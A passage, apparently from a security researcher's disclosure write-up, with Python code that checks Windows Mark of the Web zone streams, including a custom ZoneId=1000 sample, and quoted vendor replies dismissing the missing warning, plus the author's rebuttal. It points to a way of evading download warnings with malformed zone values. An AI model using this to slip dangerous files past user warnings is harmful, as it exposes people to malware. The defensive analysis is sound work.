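DANGEROUS_EXTENSIONS = {".cmd", ".com", ".exe", ".reg", ".rtf", ".url", ".vbs"}
_ZONEID_RE = re.compile(r"^ZoneId=(.*)$", re.IGNORECASE)


def parse_zone_identifier(stream):
    """Return the declared ZoneId of a Zone.Identifier stream, or None if absent or malformed."""
    section, declared = None, None
    for line in stream.splitlines():  # accepts the CRLF line ends the ECHO commands write
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        elif section == "zonetransfer" and (m := _ZONEID_RE.match(line)):
            try:
                declared = int(m.group(1).strip())
            except ValueError:
                return None
    return declared


def effective_zone(stream):
    """Fail-closed interpretation: an undefined or unparsable zone counts as Internet."""
    if stream is None:  # the file carries no Mark of the Web at all
        return 0, KNOWN_ZONES[0] + " (no Mark of the Web)"
    declared = parse_zone_identifier(stream)
    if declared in KNOWN_ZONES:
        return declared, KNOWN_ZONES[declared]
    return INTERNET, "Internet (undefined ZoneId %r treated as untrusted)" % (declared,)


def should_warn(filename, stream):
    """True when a dangerous file type carries a Mark of the Web at or above the Internet zone."""
    ext = os.path.splitext(filename)[1].lower()
    zone, _ = effective_zone(stream)
    return ext in DANGEROUS_EXTENSIONS and zone >= INTERNET


# Constructed sample streams, including the custom zone written in the last experiment
MOTW_INTERNET = "[ZoneTransfer]\r\nZoneId=3\r\n"
MOTW_CUSTOM = "[ZoneTransfer]\r\nZoneId=1000\r\n"
MOTW_GARBLED = "[ZoneTransfer]\r\nZoneId=three\r\n"
```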
"We have investigated this issue and determined that it is more of a functionality bug that there is no GUI message displayed, rather than a security vulnerability."
OUCH:
"Unfortunately, as this does not meet our bar for servicing in an immediate security update, I have closed this case."
denial of service due to CWE-20: Improper Input Validation, CWE-1284: Improper Validation of Specified Quantity in Input, CWE-1286: Improper Validation of Syntactic Correctness of Input and CWE-1287: Improper Validation of Specified Type of Input, as well as CAPEC-210: Abuse Existing Functionality, is commonly handled as a vulnerability!